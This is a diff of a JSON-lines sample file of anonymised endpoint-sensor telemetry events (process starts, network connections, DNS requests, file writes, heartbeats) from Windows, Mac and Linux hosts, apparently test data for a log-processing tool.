-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:ffff:11:8000:d140:da90:aa7a:62a5","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a00:ffff:11:809:0:0:0:200e","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"208.68.193.187","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"208.213.180.70","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"208.131.50.212","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} -{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"208.216.134.193","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"208.71.20.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} -{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} -{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"208.30.227.225","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} -{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"208.239.110.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} -{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} -{"BootArgs":" NOEXECUTE=OPTIN HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"208.6.139.160","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} -{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"208.216.134.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"208.216.150.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} -{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"208.193.200.164","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"} +{"ParentProcessId":"362225661973273550","SourceProcessId":"362225661973273550","aip":"67.43.156.14","SessionProcessId":"363970027584976556","SyntheticPR2Flags":"8","event_platform":"Mac","SVUID":"501","id":"ffffffff-1111-11eb-8dd4-061759968cdf","EffectiveTransmissionClass":"2","timestamp":"1625677521162","ProcessGroupId":"363970027584976556","event_simpleName":"SyntheticProcessRollup2","RawProcessId":"9505","ContextTimeStamp":"1625677521.137","GID":"20","ConfigStateHash":"1620585913","SVGID":"20","ConfigBuild":"1007.4.0013701.1","UID":"501","CommandLine":"/bin/sh -s unix:cmd","TargetProcessId":"363970027584976556","ImageFileName":"/bin/sh","RGID":"501","SourceThreadId":"0","Entitlements":"15","name":"SyntheticProcessRollup2MacV3","RUID":"501","aid":"ffffffffa63e404bba4bff7465ab3afb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"FileDeletedCount":"0","DirectoryCreatedCount":"0","ContextThreadId":"0","aip":"67.43.156.14","NetworkConnectCount":"0","NetworkListenCount":"0","event_platform":"Mac","NetworkBindCount":"0","NetworkRecvAcceptCount":"0","id":"ffffffff-1111-11eb-9d75-02bcf3ade03b","NewExecutableWrittenCount":"0","NetworkCloseCount":"0","EffectiveTransmissionClass":"3","SuspectStackCount":"0","timestamp":"1625677524102","event_simpleName":"EndOfProcess","RawProcessId":"33454","ContextTimeStamp":"1625677523.068","ConfigStateHash":"3090255842","ContextProcessId":"365053603452626914","AsepWrittenCount":"0","SuspiciousDnsRequestCount":"0","ConfigBuild":"1007.4.0013701.1","NetworkCapableAsepWriteCount":"0","ExecutableDeletedCount":"0","TargetProcessId":"365053603452626914","DnsRequestCount":"0","Entitlements":"15","name":"EndOfProcessMacV15","aid":"ffffffff3c0846978560dbc0048d6555","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"RawBindIP6","ContextTimeStamp":"1625677488.594","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"365042236081053654","RemotePort":"546","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"547","Entitlements":"15","name":"RawBindIP6MacV10","id":"ffffffff-1111-11eb-ad8d-064c77be2fd1","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffffc59c473aa7fcbbe7438082cb","ConnectionDirection":"2","InContext":"0","timestamp":"1625677488615","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"1620585913","Timeout":"600","aip":"67.43.156.14","SHA256HashData":"f8bd34d4ac025f862c6fe8f3fd3f170072f94f1f2ec9dc6cb2d7925422b77018","ProcessCount":"4","ConfigBuild":"1007.4.0013701.1","UID":"502","event_platform":"Mac","CommandLine":"ruby --disable-gems sorbet/feature_dependency_plugin.rb --class EmergingAlbertsonsPickupBannerDiscount --method feature_dependency --source feature_dependency Domain::FeatureDependencies::RouletteUserFeature.new(\n feature_name: FEATURE_NAME,\n variants: [FEATURE_VARIANT],\n )","Entitlements":"15","name":"ProcessRollup2StatsMacV1","id":"ffffffff-1111-11eb-822b-06081a3f0f45","EffectiveTransmissionClass":"2","aid":"ffffffff59fe460783ea45d59e417d6f","timestamp":"1625677504527","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"3090255842","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"0","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"SensorHeartbeatMacV4","ConfigIDPlatform":"4","id":"ffffffff-1111-11eb-97c6-02fd02aca859","ConfigIDBuild":"13701","EffectiveTransmissionClass":"0","aid":"ffffffffe1ad47b6b5b44ae9151a6cf3","ProvisionState":"1","timestamp":"1625677514783","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"MachOSubType":"1","ParentProcessId":"362213307092004097","SourceProcessId":"362213307092004097","aip":"67.43.156.14","SessionProcessId":"362213307092004097","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Mac","ProcessEndTime":"","SVUID":"0","ParentBaseFileName":"launchd","id":"ffffffff-1111-11eb-a9ce-02e9216bdbcb","EffectiveTransmissionClass":"2","timestamp":"1625677502500","ProcessGroupId":"362213307092004097","event_simpleName":"ProcessRollup2","RawProcessId":"56254","GID":"0","ConfigStateHash":"1620585913","SVGID":"0","MD5HashData":"88922d50263b059696c2af5a99906562","SHA256HashData":"d4ff1c438e330777002332a305fcf965cfaa7d0dbeb899293d347298cbf6d4b6","ConfigBuild":"1007.4.0013701.1","UID":"0","CommandLine":"xpcproxy com.apple.mdworker.shared.01000000-0600-0000-0000-000000000000","TargetProcessId":"363276350115996101","ImageFileName":"/usr/libexec/xpcproxy","RGID":"0","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2MacV5","RUID":"0","ProcessStartTime":"1625677502.233","aid":"ffffffff8be84591864008eb2e484920","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkReceiveAcceptIP4","ContextTimeStamp":"1625677504.982","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307488247882","RemotePort":"53","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"39920","Entitlements":"15","name":"NetworkReceiveAcceptIP4LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"1","InContext":"0","timestamp":"1625677505511","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"RawBindIP4","ContextTimeStamp":"1625677521.866","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"362579458925546303","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"53","Entitlements":"15","name":"RawBindIP4MacV10","id":"ffffffff-1111-11eb-81d4-0282ad9ac82d","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff01fc49949cf06bf0bce3c010","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677522009","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677523.901","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP4":"127.0.0.1","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364783686797112486","RemotePort":"50626","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP6MacV10","id":"ffffffff-1111-11eb-97c6-02fd02aca859","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff083845f68a7de3d95cb34361","ConnectionDirection":"0","InContext":"0","timestamp":"1625677524048","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ParentProcessId":"38911774195823","SourceProcessId":"38911774195823","aip":"67.43.156.14","SessionProcessId":"38911772846634","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1625677535.102","SVUID":"114","ParentBaseFileName":"bash","id":"ffffffff-1111-11eb-bad4-02690d039c6b","EffectiveTransmissionClass":"2","timestamp":"1625677535482","ProcessGroupId":"9277112078","event_simpleName":"ProcessRollup2","RawProcessId":"73249","GID":"119","ConfigStateHash":"1284133626","SVGID":"119","MD5HashData":"29037cef466fa57f03bd1b2a092c47a4","SHA256HashData":"a4f11f04df7aa3ac611dcbdb3e3d934a8f0523ea17b0a41a1809c380efd2d112","ConfigBuild":"1007.8.0010912.1","UID":"114","CommandLine":"pgbackrest --stanza\u003dmain archive-get 000000020004D51F0000009F pg_wal/RECOVERYXLOG","TargetProcessId":"38911778380590","ImageFileName":"/usr/bin/pgbackrest","RGID":"119","SourceThreadId":"0","Entitlements":"15","name":"ProcessRollup2LinV6","RUID":"114","ProcessStartTime":"1625677535.068","aid":"ffffffffcf45409f87ed463b40c368ec","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"NetworkConnectIP6","ContextTimeStamp":"1625677503.713","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"17307455014463","RemotePort":"0","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"41952","Entitlements":"15","name":"NetworkConnectIP6LinV5","id":"ffffffff-1111-11eb-9d7c-02e8a46f51a5","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff5a2e420c99f6b6d3a5d9de9b","ConnectionDirection":"0","InContext":"0","timestamp":"1625677503947","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"OoxmlFileWritten","ContextTimeStamp":"1625677520.973","ConfigStateHash":"3090255842","ContextProcessId":"365044948432500700","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"0500000100000000000000000000000021b0260000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OoxmlFileWrittenMacV1","id":"ffffffff-1111-11eb-8ad1-02cfdadef55f","EffectiveTransmissionClass":"2","aid":"ffffffff20bd481a98a3d1f6191047ff","timestamp":"1625677521081","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user1/Library/Application Support/Google/DriveFS/110588730849638631570/content_cache/d23/d44/432508"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677530.308","ConfigStateHash":"3469235958","ConnectionFlags":"0","ContextProcessId":"12227094573885","RemotePort":"80","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59926","Entitlements":"15","name":"NetworkConnectIP4LinV5","id":"ffffffff-1111-11eb-b727-028bbe41f38d","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffffbd064538b214ab0dce8e82c3","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677530841","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1156120155","ChannelDiffStatus":"1","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"12","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV2","id":"ffffffff-1111-11eb-b7e0-02332cdcc16d","ErrorCode":"0","aid":"ffffffff25b14d4aa96de99e24bad2fa","timestamp":"1625677493974","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677520.686","aip":"67.43.156.14","PhysicalAddress":"6e-9e-e0-1f-6d-7d","InterfaceAlias":"vethdeb0243","InterfaceIndex":"3736","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP6LinV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","PhysicalAddressLength":"6","aid":"ffffffffc9114c1898e79604708955a6","timestamp":"1625677521218","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"ChannelVersion":"0","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"1620585913","ChannelDiffStatus":"1","aip":"67.43.156.13","ChannelVersionRequired":"0","ChannelId":"210","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ChannelVersionRequiredMacV2","id":"ffffffff-1111-11eb-8cc5-02c6fb049dd3","ErrorCode":"0","EffectiveTransmissionClass":"0","aid":"ffffffff2d7b4778a73b2cf58d327e42","timestamp":"1625677480455","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"SensorHeartbeat","ConfigStateHash":"1156120155","NetworkContainmentState":"0","aip":"67.43.156.14","ConfigIDBase":"65994753","SensorStateBitMap":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ConfigurationVersion":"10","name":"SensorHeartbeatLinV4","ConfigIDPlatform":"8","id":"ffffffff-1111-11eb-993f-02b8dc387eb5","ConfigIDBuild":"11611","aid":"fffffffff6e146908cbf31d72b94b626","timestamp":"1625677540292","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"JavaClassFileWritten","ContextTimeStamp":"1625677528.570","ConfigStateHash":"3090255842","ContextProcessId":"364783686797112486","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000986b480e00000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"JavaClassFileWrittenMacV1","id":"ffffffff-1111-11eb-97c6-02fd02aca859","EffectiveTransmissionClass":"2","aid":"ffffffff083845f68a7de3d95cb34361","timestamp":"1625677528717","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user2/shopper-one/tooling/teams-plugin/build/classes/kotlin/main/com/instacart/shopper/tooling/TeamsPlugin$apply$$inlined$configure$1.class"} +{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkConnectIP4","ContextTimeStamp":"1625677512.700","ConfigStateHash":"1620585913","ConnectionFlags":"0","ContextProcessId":"364796317497854624","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"0","Entitlements":"15","name":"NetworkConnectIP4MacV10","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff96f142f6b2475f3c584ddd80","RemoteAddressIP4":"67.43.156.14","ConnectionDirection":"0","InContext":"0","timestamp":"1625677512892","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"} +{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"} +{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"67.43.156.14","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"67.43.156.14","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"} +{"LocalAddressIP4":"67.43.156.14","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"67.43.156.14","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"67.43.156.13","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 